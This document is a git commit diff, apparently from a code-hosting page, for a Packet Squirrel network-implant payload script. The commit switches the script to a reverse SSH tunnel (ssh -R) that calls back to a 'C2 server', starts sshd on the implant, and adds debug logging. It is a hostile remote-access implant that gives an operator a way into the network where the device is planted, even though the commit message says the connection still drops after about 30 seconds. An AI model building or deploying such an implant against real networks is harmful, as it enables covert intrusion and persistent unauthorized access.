mostly functional paylod, debug functionality added. The SSH connection is initialized, but exits approximately 30 seconds after start of the connection.
alaskanhighlander1@gmail.com
parent
427ca17cd1
commit
a49f410a97
|
|
@ -7,38 +7,58 @@
|
||||||
# Net Mode: NAT
|
# Net Mode: NAT
|
||||||
# Firmware: 1.2
|
# Firmware: 1.2
|
||||||
#
|
#
|
||||||
#
|
|
||||||
# LED State Descriptions
|
# LED State Descriptions
|
||||||
# Magenta Solid - SSH connecting
|
# Magenta Solid - SSH connecting
|
||||||
# Amber Blink 5 Times - Waiting for user button press
|
# Blue - SSH connection successful
|
||||||
#
|
#
|
||||||
|
|
||||||
# C2 Server address, port and tunnel port
|
# C2 Server address, port and tunnel port
|
||||||
c2_server="192.168.1.123"
|
c2_server="192.168.1.145"
|
||||||
c2_port=22
|
|
||||||
c2_tunnel_port=2222
|
c2_tunnel_port=2222
|
||||||
tunnel_user="username"
|
tunnel_user="username"
|
||||||
# no pass needed, headless mode required so RSA key file is used.
|
# no pass needed, headless mode required so RSA key file is used.
|
||||||
# generate in this directory with: 'ssh -t rsa -b 2048 -f id_rsa'
|
# generate in this directory with: 'ssh -t rsa -b 2048 -f id_rsa'
|
||||||
|
|
||||||
|
# waiting for button press to start SSH connection.
|
||||||
|
#BUTTON
|
||||||
|
#
|
||||||
|
|
||||||
|
# Magenta indicates SSH connection is launching and the server should have received the connection.
|
||||||
|
LED SETUP
|
||||||
|
|
||||||
|
echo -e "SETUP Phase\n" >> /root/payloads/switch3/debug.txt
|
||||||
|
|
||||||
# we need an IP, so it'll have to be NAT, unless implanted inline.
|
# we need an IP, so it'll have to be NAT, unless implanted inline.
|
||||||
NETMODE NAT
|
NETMODE NAT
|
||||||
|
sleep 8
|
||||||
|
|
||||||
# amber blinking for button press to launch SSH connection.
|
# debug
|
||||||
LED A BLINK
|
#echo -e "NAT configured.\n" $(ifconfig) >> /root/payloads/switch3/debug.txt
|
||||||
# waiting for button press to start SSH connection.
|
|
||||||
BUTTON
|
|
||||||
# Green indicates SSH connection has been launched and the server should have received the connection.
|
|
||||||
LED M SOLID
|
|
||||||
|
|
||||||
# -L indicates local port forwarding which tunnels connections to localhost on server to client.
|
# fix file permission problems
|
||||||
|
# chmod 600 id_rsa
|
||||||
|
|
||||||
|
# -R indicates remote port forwarding which tunnels connections to localhost on server to client.
|
||||||
# Once complete, connect to remote SSH server and connect to the squirrel by connecting to localhost at
|
# Once complete, connect to remote SSH server and connect to the squirrel by connecting to localhost at
|
||||||
# the tunnel port specified on the server to reach the Squirrel.
|
# the tunnel port specified on the server to reach the Squirrel.
|
||||||
|
#
|
||||||
|
# default port is 22
|
||||||
|
echo -e "Connecting to Server.\n" >> /root/payloads/switch3/debug.txt
|
||||||
|
|
||||||
# todo: push SSH connection to background to support button kill switch, create optional SSH connection keep-alive.
|
echo -e "starting server.\n" >> /root/payloads/switch3/debug.txt
|
||||||
ssh -L 22:127.0.0.1:$c2_tunnel_port -i id_rsa -p $c2_port $tunnel_user@$c2_server &
|
service sshd start
|
||||||
|
sleep 3
|
||||||
|
|
||||||
# SSH connection failed, target network may be hardened.
|
ssh -R $c2_tunnel_port:127.0.0.1:22 -i /root/payloads/switch3/id_rsa $tunnel_user@$c2_server
|
||||||
LED R
|
# echo $ssh_out >> /root/payloads/switch3/debug.txt
|
||||||
NETMODE OFF
|
# ssh_pid=$!
|
||||||
LED FINISH
|
|
||||||
|
echo -e "Server Connected.\n" >> /root/payloads/switch3/debug.txt
|
||||||
|
|
||||||
|
LED ATTACK
|
||||||
|
# WARNING: Initial SSH connection must be manual, since c2_server may not be included in trusted_hosts file
|
||||||
|
# SSH will prompt for verification, and to add host to trusted hosts file.
|
||||||
|
|
||||||
|
#BUTTON 365d && {
|
||||||
|
# kill $ssh_pid
|
||||||
|
#}
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue